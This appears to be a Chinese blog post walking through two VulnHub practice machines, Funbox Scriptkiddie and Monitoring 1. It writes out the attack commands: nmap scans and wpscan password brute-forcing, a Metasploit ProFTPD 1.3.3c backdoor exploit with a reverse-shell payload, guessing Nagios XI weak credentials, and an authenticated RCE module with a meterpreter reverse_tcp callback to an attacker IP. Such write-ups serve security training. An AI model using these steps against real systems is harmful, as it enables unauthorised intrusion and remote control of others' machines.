VulnHub靶机漏洞利用合集1

FUNBOX: SCRIPTKIDDIE

靶机下载地址:Funbox: Scriptkiddie ~ VulnHub

信息收集

攻击机ip:192.168.56.104。Nmap扫描存活主机确定目标机,并对目标机进行详细扫描。

# 扫描存活主机
nmap 192.168.56.0/24 -Pn -T4
# 对靶机进行详细的扫描
nmap 192.168.56.103 -A -T4

扫出了很多端口,先从80的web网页入手。访问后发现网站是由WordPress搭建的,有一个工具wpscan(kali自带的WordPress安全扫描工具)直接扫描一下。

# 初步扫描(扫描站点,主题,文件漏洞,枚举用户)
wpscan --url xxx --enumerate vp,vt,tt,u
​
# 爆出一个用户名admin
​
# 根据枚举出来的用户爆破密码
wpscan --url xxx --passwords 字典路径 --usernames admin --max-threads 100

枚举出一个用户名admin,以此爆破密码,我的字典可能不给力,而且扫描时间过长,可能这里有突破点。

ProFtpd后门漏洞利用

根据对靶机的详细扫描,发现开放了21、22端口,并且21端口是proftpd 1.3.3c。百度一下发现存在后门漏洞。kali使用searchsploit搜一下exp。

有可用的exp,怎么用呢。

cd /usr/share/exploitdb/exploits/linux/remote/16921.rb

告诉我们在msf中利用,启动msf。

search proftpd
use unix/ftp/proftpd/proftpd_133c_backdoor
options
# 有哪些需要设置,按要求设置一下
run

直接run后,报错,提示没有payload。

show payloads。列出所有可用payload。

选反向连接/cmd/unix/reverse。重新选择后需要重新配置。

run。

直接拿到root权限啊,但是当前返回的shell没有显示所在的目录和用户。需要python返回一个shell(大部分Linux都安装了Python3),检查一下是否安装python。which python,如果返回路径表示已安装,执行以下命令即可。

python -c 'import pty;pty.spawn("/bin/bash")'

找到root.txt。🎆

MONITORING: 1

靶机下载地址:Monitoring: 1 ~ VulnHub

信息收集

主机发现

攻击机所在网段:192.168.233.0/24。

nmap 192.168.233.0/24 -Pn -T4

确认靶机ip:192.168.233.130

端口扫描

nmap 192.168.233.130 -A -T4

显示开放了5个端口,其中80端口和443端口运行了相同的服务。

网站信息收集

目录扫描。

 dirsearch -u http://192.168.233.130/

访问网站首页,如下:

点击按钮进入登录页面,页面提示Nagios XI。

Nagios是一款开源的网络及服务的监控工具,用于监控Windows、Linux、Unix、Router的主机各种状态信息,物理基础资源或服务,当被监控对象健康状态出现问题时通过邮件、短信等方式通知相关管理人员或运维人员。

直接搜Nagios的默认账户和密码,默认账户和密码都是nagiosadmin。不行,试试弱密码,成功试出。觉得试太随机了就常规的bp爆破。

用户名:nagiosadmin 
密码:admin

成功登录后进入Nagios XI的服务端。根据页面信息得知版本为5.6.0。

访问/nagios。需要账户和密码,与上面一致。这个Nagios Core 4.4.3又是什么。百度后发现这两个是有区别的,Nagios XI是Nagios Core的商业版,提供了更多高级功能。

漏洞利用Nagios

根据信息收集,靶机部署了Nagios,并且知道了版本。msf直接搜索Nagios。再根据版本选择exploit/linux/http/nagios_xi_mibs_authenticated_rce模块。(Nagios XI版本是5.6.0)

测试发现该模块拿不到shell,根据版本找还有没有适合的模块,尝试后确定攻击模块用:linux/http/nagios_xi_plugins_check_plugin_authenticated_rce

use linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
# 查看所需配置
options
# payload注意一下,x86 or x64
set payload linux/x64/meterpreter/reverse_tcp
set password admin
set rhosts 192.168.233.130
set lhost 192.168.233.128
run

拿到meterpreter后,看看权限。

直接是root权限了,不用提权,进入shell找flag即可。🎆

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值